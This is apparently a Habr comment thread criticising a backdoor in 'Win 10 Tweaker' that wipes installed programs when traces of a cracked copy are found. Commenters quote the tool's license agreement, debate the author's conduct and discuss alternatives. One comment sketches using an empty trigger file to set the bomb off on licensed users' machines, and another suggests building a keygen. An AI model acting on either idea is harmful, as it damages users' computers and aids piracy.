    С телеметрией та же фигня. На работе мобильный анлим себе подрубил. Все висящие на нем компы настроенные, а один новый — с чистой ОЕМ десяткой. И он телеметрией раз в час примерно гонит что-то на кучу адресов M$ со скоростью 3-5 мб/с (исходящий трафик) в течении 10-15 минут (и кладет весь канал моего 3G). Что оно там такое собирает в таких объемах? Видео использования с экрана пишет и стримит в MS? Нафиг надо такое счастье.
    
    Туда же и апдейты. Я без понятия как они накатываются, но сбэкапить настройки и данные, перставить винду на актуальную и заново накатить весь софт оказывается на порядок быстрее чем накатывать апдейты. И это если забыть про их навязчивость, вылезание в самый неподходящий момент, скачивание втихоря по лимитному Wi-Fi смартфона и т.д. Система должна спрашивать желаю ли я выкачать новые апдейты, а не выкачивать и потом спрашивать, желаю ли я поставить уже выкачанные (и сожравшие мои деньги за трафик) апдейты.
    Ну и сырость/багнутость апдейтов, конечно (и выкатка патчей для патчей патча)
    
    Sanctuary_s Автор
    14.05.2021 22:26
    #23035758
    +1
    Ну, так-то да. У нас ультрабуки по 170 000 стоят.
    
    zartarn
    15.05.2021 00:50
    #23036092
    -1
    А у людей с офисными ноутами по 450$ на Celeron или, боже упаси, древних до-рязаневских AMD, антивирь периодически отжирает почти полностью все их «2 ядра, 2 гига», вызывая адские тормоза машины.
    
    На древнем, 10 летнем ноуте (aсer aspire 5741g, купленый за 20к когда то), с момента выхода десятки установлено, шуршит и не мешает. Оперативки 4гб, и вместо харда SSD.
    Антивирь не очень дружит с чтением\записью данных. На SSD это не заметно совсем, на HDD — еле еле. А вот если запускать венду с внешнего устройства (WindowsToGo), то в случае HDD — антивирь вечно весь USB «забивает», а если SSD — летает и никаких проблем. ОЧень часто гружусь по USB с внешнего SSD. Сталкивался, ругался, отключал. При этом если ставишь нормальный антивирь (я хз в какой организации сидят с вендовым антивирем, этож бред), то вендовый отключается, и полностью передает полномочаю тому же условному Касперскому.
    
    И он телеметрией раз в час
    Как Вы решили что это именно телеметрия?
    
    Туда же и апдейты.
    Может у Вас и настройки какие то специфичные что так долго накатываются обновления? этот старенький ноут у меня прекрасно пережил с самой первой десятки все обновления, принудительно начисто так и не переустанавливал ни разу. И софт не слетал, кроме как отключил касперского когда то (даже скандал был небольшой) Ну и был когда то прикол со слетаемыми ассоциациями, но это была из за кривого старого софта, который пытался сам передергивать под себя в обход средств венды, я даже в коментариях тут об этом рассказывал когда то). Либо места мало на системном диске. ТАк как при некоторых обновлениях создается практически полная копия системы, для возможности откатиться к прошлома состоянию.
    
    и заново накатить весь софт оказывается на порядок быстрее чем накатывать апдейты.
    
    А Вы еще помните, сколько времени устанавливается 7? А ХР? там что то около 45минут — 1 часа до первого полноценного входа в систему, а если в установочный пакет ХР еще интегрированы обновления, драйвера, то еще куда дольше. 10ка же с нуля ставится вот прям от силы минут 15, еще и драйвера подтянет сама. (вот честно, не замерял, буквально на той неделе накатывал на «ноут» за ~30к).
    Так что вполне закономерно что в некоторых случаях, переустановит систему начисто быстрее, чем обновить. Все же Вы знаете Что вам надо сохранит а что нет, а венде приходится перестраховываться и бэкапит всё.
    
    И это если забыть про их навязчивость
    
    А как давно вы заходили в настройки? и актуализировали венду? вроде года два может три уже никакой навязчивости. Максимум в уведомлениях что то мелькнет.
    
    скачивание втихоря по лимитному Wi-Fi
    
    Было 3 раза наверно, какой то небольшой патч безопасности. Всегда выбрано там «лимитное подключение». Остальное время ждет скачивания.
    А еще уже давно вот так, чтоб обновления ни сами не установились, ни ждать потом при включении
    
    Заголовок спойлера
    
    JerleShannara
    15.05.2021 02:36
    #23036272
    +1
    Вот про десятку не надо, я притащил из магазина типичный ноут «2 ведра, 2 гига, игровая видимо карта», включил, он начала настраивать винду. Спустя полтора дня ноут был готов, путём next->next->next он такая умница обновления поставил. В случае с семёркой или хрюшей (обе тоже лицензии) установка и обновление(тех версий винды, что предлагали производители) не занимали более 5 часов, в отличии от десятки(тоже той, которую производитель с ноутом поставлял). Ну а про то, почему у меня полумёртвая семёрка(лицензионная) на домашней машине существует и чем в этом виновата десятка, я могу долго рассказывать.
    
    Physmatik
    14.05.2021 22:26
    #23035762
    -1
    500МБ+ используемой оперативки и всплески на 4+ загруженных потока это не "тихо шуршит".
1. goldrobot
  14.05.2021 20:44
  #23035476
  Ну люди привыкли малвари отключать или удалять. Тут как видите это без 3рдпати софта сделать очень тяжело, вот и появились твикеры.

scorp_nv
14.05.2021 13:44
#23033880
А каким образом первоначально происходит активация данной гадости? Когда её попытались взломать до платной версии? Или когда слишком долго пользуются бесплатной? Неизвестно?
Ведь папки и файлы сами себя не создадут по указанным путям.
Имхо, оба скрипта гадкие, но с паролем таки вообще атас для обычных пользователей.
С удалением могут догадаться понажимать кнопки отмены, хотя не факт.
1. Sanctuary_s Автор
  14.05.2021 13:45
  #23033888
  Автор, скачав взломанную версию, узнал, где ее собрали и добавил наличие этого файла как триггера к «действию». То есть бэкдор спит, если проверка пройдена, ифю качает код, если файл обнаружен.
  1. scorp_nv
    14.05.2021 13:58
    #23033952
    В общем реакция на установку «репака», при условии обязательного и безусловного автообновления программы — выстрелит. ЧСВ — выше всех разумных пределов. Да и ФИО — говорящее о многом.

scorp_nv
14.05.2021 13:44
#23033882
+1
Там ещё и пользовательское соглашение обалденное. Цитировать слишком много, лучше почитать самим:
Соглашение
1. WaXe
  14.05.2021 14:00
  #23033962
  +2
  Тем временем, пишет что заблокирован хостингом
  
  Sanctuary_s Автор
  14.05.2021 14:08
  #23034008
  Сурово. Видать, кто-то пожаловался. Но почему основной ресурс, а не ресурсы, используемые в рассылке трояна?..
  
  Hait
  14.05.2021 14:27
  #23034080
  Ну сам твикер же с основного ресурса качается? Тут проблема в самом твикере, использующем такую возможность, а не в том, что где-то лежит вредный код
  
  Sanctuary_s Автор
  14.05.2021 14:28
  #23034084
  Ну, так-то да. Просто не все заблокировали.
  
  Hait
  14.05.2021 14:37
  #23034112
  А сам файл твикера не остался? Может стоит засабмитить в microsoft о нём?
  
  Sanctuary_s Автор
  14.05.2021 14:40
  #23034130
  Они знают. На видео видно, что я через 10 нажатий смог его сохранить. Подписи же цифровой нет у трояна. :)
  
  Hait
  14.05.2021 14:43
  #23034152
  Ну неопознанные и вредоносные — разные оповещения. Во втором случае он его ещё и при запуске сносить будет :)
  
  Sanctuary_s Автор
  14.05.2021 14:47
  #23034174
  Справедливо)
  
  scorp_nv
  14.05.2021 14:35
  #23034100
  Нашёл, долго шукать пришлось
  Пользовательское соглашение
  
  03.10.2019
  
  1. Общие положения
  
  1.1. Настоящее Пользовательское соглашение (далее «Соглашение») регулирует отношения по использованию программного обеспечения «Win 10 Tweaker» (далее «Программное обеспечение» или «ПО») между ИП Аванесян Хачатур Сержикович, являющимся правообладателем исключительных прав на Программное обеспечение (далее «Правообладатель») и физическим или юридическим лицом, которое скачивает и использует ПО (далее «Пользователь»).
  1.2. Скачивая, копируя или каким-либо иным образом используя Программное обеспечение, Пользователь выражает своё полное и безоговорочное согласие со всеми условиями Соглашения. Начало использования Программного обеспечения Пользователем означает его согласие на заключение Соглашения на изложенных в настоящем документе условиях.
  1.3. Использование Программного обеспечения разрешается только на условиях настоящего Соглашения. Если Пользователь не принимает в полном объёме условия Соглашения, Пользователь не вправе использовать Программное обеспечение в каких-либо целях. Использование Программного обеспечения с нарушением (невыполнением) какого-либо из условий Соглашения запрещено. Нарушение Соглашения влечёт за собой ограничение работы Программного обеспечения на устройстве Пользователя.
  1.4. Настоящее Соглашение может быть изменено Правообладателем в одностороннем порядке без какого-либо специального уведомления, новая редакция вступает в силу с момента опубликования на веб-странице: win10tweaker.pro/agreement.
  1.5. К настоящему Соглашению и всем отношениям, связанным с использованием Программного обеспечения, применяется право Российской Федерации, и любые претензии или иски, вытекающие из отношений по настоящему Соглашению или из использования Программного обеспечения, должны быть поданы и рассмотрены в суде по месту нахождения Правообладателя. Соблюдение претензионного (досудебного) порядка урегулирования спора обязательно.
  1.6. Официальной является русскоязычная версия данного Соглашения. Правообладатель может предоставить Пользователю перевод настоящего Соглашения с русского на другие языки, однако в случае противоречия между условиями Соглашения на русском языке и его переводом, юридическую силу имеет исключительно русскоязычная версия Соглашения.
  1.7. В случае, если какая-либо часть настоящего Соглашения будет признана утратившей юридическую силу (недействительной) и не подлежащей исполнению, остальные части Соглашения сохраняют свою юридическую силу и подлежат исполнению.
  1.8. Алгоритмы работы ПО и его исходные коды (в том числе их части) являются коммерческой тайной Правообладателя. Любое их использование или использование ПО в нарушение условий настоящего Соглашения рассматривается как нарушение прав Правообладателя и является достаточным основанием для лишения Пользователя предоставленных по настоящему Соглашению прав.
  
  2. Права на Программное обеспечение
  
  Исключительное право на ПО принадлежит Правообладателю.
  
  3. Использование ПО, Активация и Код активации
  
  3.1. Правообладатель предоставляет Пользователю неисключительное непередаваемое право использовать Программу по прямому функциональному назначению.
  3.2. Правообладатель за установленную плату предоставляет Пользователю право на использование всех возможностей ПО при покупке Кода активации для ПО.
  3.3. Код активации является конфиденциальной информацией. Пользователь не вправе публиковать или передавать каким-либо третьим лицам Код активации.
  3.4. Код активации для ПО является уникальным идентификатором, генерируемым в процессе совершения покупки. Уникальный Код активации предоставляет возможность использовать все возможности ПО только на том устройстве, с которого совершилась покупка Кода активации.
  3.5. Пользователь, которому был предоставлен Код активации, модифицируя, обновляя или заменяя своё устройство, с которого он совершал покупку Кода активации, меняет уникальный идентификатор своего устройства, по которому ранее генерировался уникальный Код активации. Как следствие, Пользователь лишается Кода активации, т.к. ПО теряет связь между Кодом активации и устройством, для которого генерировался Код активации.
  3.6. Программное обеспечение включает в себя средства контроля, проверки и подтверждения факта использования Пользователем Программного обеспечения в соответствии с настоящим Соглашением. Такие средства обрабатываются Программным обеспечением, и, в случае нарушения настоящего Соглашения, ПО должно передать эти данные Правообладателю через доступные каналы связи. Пользователь не вправе предпринимать какие-либо действия, направленные против использования Правообладателем вышеуказанных средств контроля, проверки и подтверждения соблюдения настоящего Соглашения.
  3.7. После получения активации для ПО, Пользователь имеет полную версию ПО, возврат которой не предусматривает ни один закон Российской Федерации. Исходя из 1) невозможности инициирования процедуры возврата, 2) опираясь на невозможность проверить факт отказа Пользователя от использования ПО, 3) а также согласно Пленуму Верховного Суда Российской Федерации (постановление которого от 28.06.2012 № 17 не относит «Предоставление права на использования ПО» к товарам, работам или услугам, защищаемым законом «О защите прав потребителей»), возврат денежных средств после факта получения Пользователем активации ПО не предусмотрен.
  
  4. Ограничения использования ПО
  
  4.1. Пользователь Программного обеспечения не имеет права на получение информации о реализации алгоритмов, используемых в Программном обеспечении, исследовать программный код Программного обеспечения, сжимать, шифровать, расшифровывать или модифицировать исполняемый файл Программного обеспечения, а также проводить любые операции, затрагивающие целостность исполняемого файла Программного обеспечения. Пользователь Программного обеспечения может создавать производные произведения с использованием ПО, основанные на основе ПО, целиком или частично, а также осуществлять (разрешать осуществлять) иное использование ПО, только с письменного согласия Правообладателя.
  4.2. Пользователю запрещается воспроизводить, повторять, копировать, сдавать ПО в аренду, прокат или во временное пользование, продавать и перепродавать, лицензировать/сублицензировать, использовать для коммерческих целей какие-либо части Программного обеспечения.
  4.3. Правообладатель имеет право лишить Пользователя Кода активации в случае нарушения Пользователем условий настоящего Соглашения.
  4.4. Правообладатель имеет право лишить Пользователя Кода активации без информирования Пользователя и указания причин Пользователю.
  4.5. Пользователю запрещается удалять или изменять уведомления об авторских правах или иное указание на Правообладателя на любой копии ПО.
  4.6. Пользователю запрещается использовать ПО для любых несанкционированных или незаконных целей в соответствии с применимым законодательством.
  
  5. Прочие условия
  
  5.1. ПО может время от времени автоматически загружать и устанавливать обновления, направленные на улучшение ПО и могут иметь форму дополнительных модулей или полностью новых версий Программы. Пользователь настоящим уведомлён и соглашается с автоматическим обновлением ПО, включая запрос, загрузку и установку обновлений на устройство Пользователя без каких-либо дополнительных уведомлений.
  5.2. Выполнение отдельных функций Программы возможно только при наличии доступа к сети Интернет. Пользователь самостоятельно получает и оплачивает такой доступ на условиях и по тарифам своего оператора связи или провайдера доступа к сети Интернет.
  5.3. Правообладатель может оказывать поддержку Программного обеспечения и Пользователя добровольно. В зависимости от формы обращения Пользователя к Правообладателю, Правообладатель оставляет за собой право расценивать обращение Пользователя, как нарушение данного Соглашения. Просьбы Пользователя об оказании технической поддержки Пользователя по вопросам, связанным с функционированием операционной системы, любого программного обеспечения, скачанного или установленного на устройство, а также иные вопросы Пользователя Правообладателю, в зависимости от формы обращения, могут расцениваться нарушением данного Соглашения.
  5.4. Использование ПО допускается только после принятия соглашения в программе правой кнопкой мыши. Нажатие левой кнопкой мыши по кнопке «Принять» в ПО является нарушением данного Соглашения.
  
  Политика конфиденциальности
  
  Политика конфиденциальности действует по отношению к Пользователям Программного обеспечения, соблюдающим настоящее Соглашение. Программное обеспечение не собирает и не передает личные данные Пользователя. Программное обеспечение не собирает сведения, которые позволяют идентифицировать Пользователя. Программное обеспечение использует только те сведения, которые определяют алгоритмы работы самого Программного обеспечения с операционной системой Пользователя, а также средства, описанные в настоящем Соглашении. Программное обеспечение в принципе развивалось, развивается и будет развиваться таким образом, что данные пользователя никак не могут быть скомпрометированы. Данные Пользователя, опыт его использования и статистика использования его устройства не обрабатывается Программным обеспечением, и никогда не будут обрабатываться. Программное обеспечение создавалось с уклоном на право Пользователя на личную тайну и приватность в целом. В отдельных случаях Пользователь предоставляет сведения о своём устройстве и данных, которые обрабатывает его операционная система, а также выражает согласие на изучение или обработку Правообладателем предоставленных данных, предусмотренных действующим законодательством РФ как неавтоматизированными, так и автоматизированными способами.
  
  Ответственность и гарантии
  
  Программное обеспечение предоставляется на условиях «как есть» (as is). Правообладатель не предоставляет никаких гарантий в отношении безошибочной и бесперебойной работы ПО, соответствия ПО конкретным целям Пользователя, рыночному уровню, а также не предоставляет никаких иных гарантий, прямо не указанных в настоящем Соглашении. Правообладатель не несёт никакой ответственности за какие-либо прямые или косвенные последствия какого-либо использования или неиспользования ПО и/или ущерб, причинённый Пользователю и/или третьим сторонам в результате какого-либо использования или неиспользования Программы, в том числе из-за возможных ошибок или сбоев в работе Программы.
  
  Право собственности
  
  Настоящее Соглашение даёт Пользователю ограниченное право на использование Программного обеспечения. Правообладатель сохраняет за собой все права, включая все авторские права и другие права на интеллектуальную собственность, относящиеся к Программному обеспечению. Все права, не указанные в настоящем Соглашении, включая федеральные и международные авторские права, принадлежат Правообладателю. Копирование и распространение ПО допускается при одобрении Правообладателем индивидуально по запросу.
  
  2021 Win 10 Tweaker. Все права защищены. Программное обеспечение защищено авторским правом и международными соглашениями об авторском праве, а также другими законами и договорами об интеллектуальной собственности.
  
  Sanctuary_s Автор
  14.05.2021 14:47
  #23034178
  Не могу вычленить через телефон, что тут сокрыто?)
  
  WaXe
  14.05.2021 14:57
  #23034244
  +1
  Пользовательское соглашение
  …
  5.4. Использование ПО допускается только после принятия соглашения в программе правой кнопкой мыши. Нажатие левой кнопкой мыши по кнопке «Принять» в ПО является нарушением данного Соглашения.
  …
  
  Spy_W
  14.05.2021 15:27
  #23034390
  +1
  Что же делать обладателям сенсорных экранов, тачпадов и трекпадов? Вот ведь он коварный.
  
  PocketM
  14.05.2021 20:50
  #23035502
  И далее:
  
  Политика конфиденциальности действует по отношению к Пользователям Программного обеспечения, соблюдающим настоящее Соглашение.
  
  MichaelBorisov
  14.05.2021 16:31
  #23034662
  Спасибо. Конечно, условия договора страшные, «драконовские». Но их истинная сила определяется в суде. Без суда, и пользователи могут класть болт на лицензионные ограничения, и автор может забивать на взятые на себя обязательства, вроде «не собирать персональную информацию». Без всяких последствий.
  
  Интересно, подавал ли автор на кого-нибудь в суд за нарушение условий этого договора? Или наоборот, подавал ли кто-нибудь в суд на автора за какие-нибудь действия, вроде неправомерного лишения Активационного ключа, отказ вернуть деньги и т.д.?
  
  Sanctuary_s Автор
  14.05.2021 16:34
  #23034672
  Вооьще еще после запуска убивается доступ в инет. Видать я портит что-то или выключает службы. Лень было разбираться.
  
  Adjuster2004
  14.05.2021 20:12
  #23035394
  4.4. Правообладатель имеет право лишить Пользователя Кода активации без информирования Пользователя и указания причин Пользователю.
  Зверь. Сказал как отрезал.
  
  scorp_nv
  14.05.2021 22:23
  #23035754
  +2
  Сказал, как отрезал начинается с:
  1.4. Настоящее Соглашение может быть изменено Правообладателем в одностороннем порядке без какого-либо специального уведомления, новая редакция вступает в силу с момента опубликования на веб-странице: win10tweaker.pro/agreement.
  
  И вообще это соглашение можно на цитаты разбирать, мемов будет, от души.
  
  morijndael
  15.05.2021 10:03
  #23036600
  3.4. Код активации для ПО является уникальным идентификатором, генерируемым в процессе совершения покупки. Уникальный Код активации предоставляет возможность использовать все возможности ПО только на том устройстве, с которого совершилась покупка Кода активации
  Хмм, но если там код получается из идентификаторов железа, то можно отреверсить, сделать кейген, и никаких следов взлома не останется
  
  Sanctuary_s Автор
  14.05.2021 15:32
  #23034424
  Заработал.
  
  4eyes
  14.05.2021 15:48
  #23034518
  +1
  В этом коментарии просто напоминание о том, что желающие могут высказаться об уместности рекламирования этого на Youtube с использованием механизма жалоб на видео или каналы, где приложение продвигается.
  
  где-то тут и еще один тут
  
  4eyes
  14.05.2021 15:35
  #23034440
  комментарий удален по просьбе правообладателя
  Дубликат ^
1. sigprof
  14.05.2021 14:03
  #23033984
  В оригинале уже не почитать — «Сайт заблокирован хостинг-провайдером», видимо, таки кто-то нажаловался на малварь; archive.org сохранить текст тоже не смог.

4eyes
14.05.2021 13:55
#23033936
А откуда берется папка Turbo.net? Её создает какой-то кряк?
1. Sanctuary_s Автор
  14.05.2021 13:59
  #23033960
  Да. Хвосты от использования взломанной версии.
  1. AbnormalHead
    14.05.2021 14:52
    #23034218
    +3
    Не обязательно. Эта папка может создаться при использовании софта портабелизации ПО — Turbo Studio
    Запустил какую нибудь безобидную портабельную программу, собранную этой системой и тригер в этом «твикере» сработал.
    
    Sanctuary_s Автор
    14.05.2021 14:59
    #23034258
    Да, я не так выразился. В общем мрак.
    
    AngelNet
    14.05.2021 18:42
    #23035148
    +1
    Ну вообще то если устанавливать в сборках турбо-студии правильную изоляцию, то они не мусорят в хостовой ОС ничем кроме ключа в реестре:
    
    Просто по выходу из портабельной программы давим куст рег-файликом или другими средствами кому чем удобнее.
    (я себе EXE сделал для удаления, чтоб с проверкой на остатки).

vorphalack
14.05.2021 14:03
#23033978
рубрика «жизнь насикомых». сколько людей из этого поста вообще узнали о существовании такого говноподелия и его автора?
1. Sanctuary_s Автор
  14.05.2021 14:12
  #23034028
  +1
  Очегь много и знало. Весь инет набит статьями, как все стало быстро летать (что?!), и видео-обзорами (купленными?).
  1. institor
    14.05.2021 14:20
    #23034058
    Я только из этой статьи узнал, стало интересно, что же он «творит» на форуме.
    Мда.
    Он про себя пишет с большой буквы. Так и пишет: «Мне», «Моему» и т.п.
    Выглядит дико. И еще стиль общения такой, гопнический, добавляет…
1. SagePtr
  14.05.2021 17:38
  #23034904
  +1
  Я раньше узнал, когда друг попросил помочь установить какую-то софтину, ругавшуюся в духе «Указанная служба отключена» без указания на конкретную службу.
  Первое, что мне попалось на глаза при подключении к компьютеру — это тот самый твикер, в итоге мы не стали играть в «угадай что вырезано», а просто переставили винду от греха подальше, ибо неизвестно, чего он там ещё в системе напортачил. И как сейчас выяснилось, не зря.

porsev
14.05.2021 14:13
#23034036
Блин это печально, программа удобная чтобы отключить всё ненужное и не ковырять ручками реестр и прочее, вопрос а есть ли альтернативы?
1. Sanctuary_s Автор
  14.05.2021 14:13
  #23034038
  Есть, но не графические версии. Там думать надо будет.
1. madalien
  14.05.2021 14:38
  #23034118
  Windows 10 Sophia Script, открытым исходным кодом.
  1. Felar
    14.05.2021 21:27
    #23035594
    там нет отключения телеметрии
1. qw1
  14.05.2021 14:53
  #23034224
  а есть ли альтернативы?
  В одной очень хорошей сборке винды я нашёл встроенную
  O&O ShutUp10: Free antispy tool for Windows 10
  Мне понравилось: возможностей много, GUI, разработчик O&O — старый проверенный разработчик всяких системных утилиток (помню его дефрагментатор ещё со времён WinXP)
  1. Catslinger
    14.05.2021 14:59
    #23034264
    Она мне подставу сделала. Я включил галочку «Отключить обновление драйверов», не помню зачем — она в оранжевой категории. А позже хотел выключить — а она не отключается. То есть галочка отключается, а установка драйверов для нового железа не работает. Искал в реестре, вводил какую-то чушь в Poweshell — но в итоге всё равно пришлось переустанавливать всю винду.
    
    SandroSmith
    14.05.2021 20:43
    #23035470
    -1
    Вот именно поэтому и не нужно бездумно лезть в реестр, а тем более давать такую возможность левым программам.
  1. Sanctuary_s Автор
    14.05.2021 15:00
    #23034272
    Это не альтернатива.
    
    qw1
    14.05.2021 15:16
    #23034350
    Мне нужны только твики, касающиеся privacy. А всякие глупости, типа отключения файла подкачки — не нужны. Поэтому для меня вполне себе достойная замена.
1. d-stream
  14.05.2021 23:38
  #23035924
  Как забавный вариант — криптопро. При установке по умолчанию отключает телеметрию. Ну или по их описанию на саппорте… правда это уже «руками».
1. chainyk445
  15.05.2021 00:34
  #23036046
  для отключения телеметрии O&O ShutUp10 открытым исходным кодом. Так же для удаления лишних winx приложений O&O AppBuster, остальное искать по необходимости, или ручками
  1. Sanctuary_s Автор
    15.05.2021 00:35
    #23036048
    Для удаления UWP-приложений мы первые, кстати, написали на чистом PS код для отображения локализованных имен пакетов с использованием графики. :)

mistergrim
14.05.2021 14:22
#23034070
Самое смешное, что в результате вот этой мелкой мстительности автор ничего не получает (попавшиеся будут в дальнейшем бежать от его поделок, как от огня), а теряет многое — репутацию, например.
С другой стороны, ситуация на руборде обсуждается уже полгода, и nobody cares.
1. institor
  14.05.2021 14:37
  #23034106
  Ну руборд, так-то, закрыт — нужна регистрация даже для просмотра… обсуждение идет в узком кругу
  1. mistergrim
    14.05.2021 14:40
    #23034128
    Закрыт только варезник. Но там и в открытой теме информации предостаточно.
    Ну и не только на руборде, давно уже обсуждение за пределы вытекло.
1. DoctorMoriarty
  14.05.2021 23:53
  #23035952
  +1
  Тем же юзерам на nnm пофиг, что пишут на РуБорде и Хабре — оттуда уже удаляют сразу после отправки комментарии со ссылкой на эту статью и даже с простым упоминанием, что офсайт Win 10 Tweaker забанен провайдером. Остаются только комментарии типа «Молодец!», «У меня всё теперь летает!» и т.п. Секта адептов, однако. Адептов «народного разгона и чистки» ничего убедить не может — с ними тот же Стеркин (который outsidethebox.ms) в комментариях у себя на сайте пытался воспитательную работу проводить, но они, разумеется, знают как готовить Windows лучше, куда там Руссиновичу.
  1. Sanctuary_s Автор
    15.05.2021 00:43
    #23036074
    Eastoop, конечно, конченный там. Интересно: он реально дурак или на зарплате сидит?

Catslinger
14.05.2021 14:32
#23034090
Ну и где блин Роскомпозор? Где родная милиция? Вот же настоящий киберзлоумышленник, выдал себя с потрохами, почему бездействуют? Заблокировать сайт, заблокировать платежи на счёт? Выдать предписание тем антивирусам, что имеют юрлицо в россии, чтобы удаляли? Где?

Sanctuary_s Автор
14.05.2021 14:34
#23034096
Ну, справедливости ради, надо сказать, что AV итак все триггерятся.

MerCrow
14.05.2021 14:42
#23034140
-1
Забавно наблюдать, как люди поливают грязью человека за то, что тот просто решил защитить свой труд (а создание такого твикера таки труд и немалый) от спирачивания куда бОльшими засранцами, чем он сам. Но нет, надо же раздуть "Кококо, бекдор! Автор говнюк, кококо!" По мне так люди, которые с пеной у рта орут, что этот твикер орудие зла, а его автор страшнее любого пирата ничем не лучше тех любителей и фанатиков данного продукта, о которых они же и писали выше.
1. Sanctuary_s Автор
  14.05.2021 14:42
  #23034142
  Посмешил.
1. mistergrim
  14.05.2021 15:10
  #23034316
  +1
  Это «защита» сродни той, что если у меня сосед тачку на даче сп…т, я ему дом сожгу. Защитил своё имущество.
  1. Sanctuary_s Автор
    14.05.2021 15:12
    #23034326
    Продал дом, купил ворота — стал я запираться.
  1. unsignedchar
    14.05.2021 16:58
    #23034766
    +5
    если у меня сосед тачку на даче сп…т, я ему дом сожгу
    
    Сожгу все дома, где есть тачки, похожие на мою.
1. Catslinger
  14.05.2021 15:12
  #23034334
  -1
  Узнав о ситуации, пишем малварь, которая триггерит эту заложенную бомбу у лицензионных пользователей. Причём на эту малварь даже самые параноистые антивирусы не гавкнут — она создаёт один пустой файл. Так что можно спокойно залить в доверенные каталоги. В итоге у кучи людей убивается комп. Ну и кто больше поспособствовал происходящему — мы или автор изначальной бомбы?
  
  Программа имеет полное право защищаться от взлома. И хорошо защищается — вон Directory Opus до сих пор сломать не могут, хотя у него нет никакого серверного компонента в защите. Но если она делает хоть что-то большее, чем просто отказывается работать — то это уже малварь от разработчика, и за такое нужно удалять отовсюду, как любую малварь, и уголовку вешать, если получится.
  
  Из описания этой бомбы я так понял, что если кто-то сначала юзал кряк, а потом заплатил — то у него тоже сработает: следы-то остались. Та же история была однажды с FLStudio: она при обнаружении кряка удаляла только себя и свою папку с пресетами. Вот только оказалось, что 1) куча народу хранила свои проекты в стандартной папке с пресетами, потому что туда всё сохранялось по умолчанию. 2) Часть заплативших юзеров тоже задело. С тех пор FLStudio так не делает, хотя её-то пиратят вообще по чёрному.
1. 4eyes
  14.05.2021 15:29
  #23034406
  +1
  Попутно, этот «труд» чистит компы от 50 установленных приложений пользователям лицензионной версии при запуске портабельного софта собранного с помощью turbo.net.
  
  … от спирачивания куда бОльшими засранцами, чем он сам.
  Вот вы серьёзно? Это звучит сродни "(персона1) навалил кучу соседу под дверь, но это не страшно, т.к. в мире существует куча засранцев, которые вообще выбивают двери к черту в процессе кражи со взломом". Или "(персона2) отжал часы в подворотне, но это не страшно, некоторые вообще в процессе грабежа забирают все что могут еще и по голове бьют".
  1. Mingun
    14.05.2021 20:15
    #23035404
    +1
    Да и ещё, насколько я понял, даже если поставить удалённый софт снова, при следующей перезагрузке/выходе-входе из учётной записи он снова почистится, так как строки удаления пишутся в ключ реестра Run, а не RunOnce, то есть, запускаются при каждом старте системы…
1. MTyrz
  14.05.2021 17:17
  #23034830
  +8
  Единственный коммент, зарегистрировался сегодня…
  Автор поделия, покажите личико.
1. JSFilin
  14.05.2021 18:03
  #23035008
  Это незаконно.
1. RigidStyle
  14.05.2021 21:53
  #23035682
  +1
  Защитить — хорошо. Бекдор — плохо.
  Аналогия: спасти человечество от бедности и болезней — хорошо. Спасти человечество от бедности и болезней, убив всех бедных и больных — плохо.
1. scorp_nv
  14.05.2021 22:39
  #23035800
  +1
  Точно автор в тред пришёл, я то думаю, кто мне в карму минус нарисовал.
  1. Sanctuary_s Автор
    15.05.2021 00:44
    #23036076
    +1
    Аналогично. Но он новорег. Значит, основа есть.
    
    MTyrz
    15.05.2021 01:12
    #23036144
    +1
    Кстати да.
    Старается, маленький.

NuckChorris
14.05.2021 15:08
#23034310
+1
Вот он себе на статью зарабатывает
1. Gengenid
  14.05.2021 16:56
  #23034752
  А автор из России? Есть его данные?
  1. Sanctuary_s Автор
    14.05.2021 16:57
    #23034756
    +1
    Он ИП из Томска.
    
    Gengenid
    14.05.2021 17:05
    #23034784
    И полгода это обсуждают и никто заявление в полицию не написал? Это же УК РФ 273 ч.2.
    Вы не будете против, если я со ссылкой на вашу статью заявление напишу?
    
    Sanctuary_s Автор
    14.05.2021 17:16
    #23034826
    -6
    Не надо ни меня, ни статью приплетать, ни заявление подавать. Настоящие пострадавшие итак подадут, если надо. Я не призываю ни к каким действиям, кроме порицания его поступка.
    
    Gengenid
    14.05.2021 17:21
    #23034850
    +3
    Ок. Хотя зря.
    
    NuckChorris
    14.05.2021 18:50
    #23035174
    +1
    Вот лучше было бы так — «Прошу прокуратуру считать эту статью основанием для возбуждения уголовного дела против… по статье...»
    
    Gengenid
    14.05.2021 19:02
    #23035210
    Не прокуратуру, МВД. Прокуратура предварительным следствием не занимается.

Saivrem
14.05.2021 15:08
#23034312
Очень наглядная статья. Всегда удивлялся тому, с какой охотой люди доверяют «Васе» и винят во всех смертных грехах корпорации, как будто «Вася» по умолчанию свят.

LexaZ
14.05.2021 15:45
#23034498
… а ведь если бы удаляла программа сама себя и отправляла, предположим, id лицензии разработчику, то таких проблем бы не было. Спокойнее надо быть, это, как показывает практика, полезно. ИМХО

remountd
14.05.2021 16:37
#23034686
+1
Написал модераторам на заблокированном в РФ торрент-трекере (у него есть приставка ннм) о наличии вредоноса в последнем релизе Win 10 Tweaker, со ссылкой на статью и пункт нарушаемых правил. И меньше чем за пять минут был отправлен в бан.

Я конечно может наивный и в чём-то глупый человек, который верит в премодерацию вареза на ресурсе, предназначение которого — выкладывание и хранение вареза; и в то, что с виду "бесплатный" контент не может специально оказаться заражённым чем-то другим по усмотрению администрации ресурса. Но просто ещё не было поводов, с разбором полётов, усомниться в обратном.
Заголовок спойлера
1. drdead
  14.05.2021 17:11
  #23034812
  +1
  Если вам интересно, вот последний комментарий в том треде от "Куратора программ":
  По причине наплыва разносчиков сплетен обсуждение временно закрыто.
  Все желающие получить сатисфакцию от автора по поводу очередной сплетни по очернению программы, идите на авторский сайт и там требуйте пояснений. Ссылка в описании раздачи есть.
  
  Sanctuary_s Автор
  14.05.2021 17:17
  #23034834
  Уже написал моберу на rutracker. Сказал, что все можно опубликовать. Но я не понял пока где)
  
  remountd
  14.05.2021 19:46
  #23035314
  +2
  Почитал тему полностью. Интересно конечно наблюдать некое однотипное пренебрежительное отношение к пользователям программ, со стороны всяких меценатов и зам. кураторов. Причём как такового «наплыва разносчиков сплетен» в комментариях нет.
  
  Заголовок спойлера
  Тот последний комментарий на текущий момент времени удалён и тема снова открыта.
  
  SagePtr
  14.05.2021 20:10
  #23035382
  +3
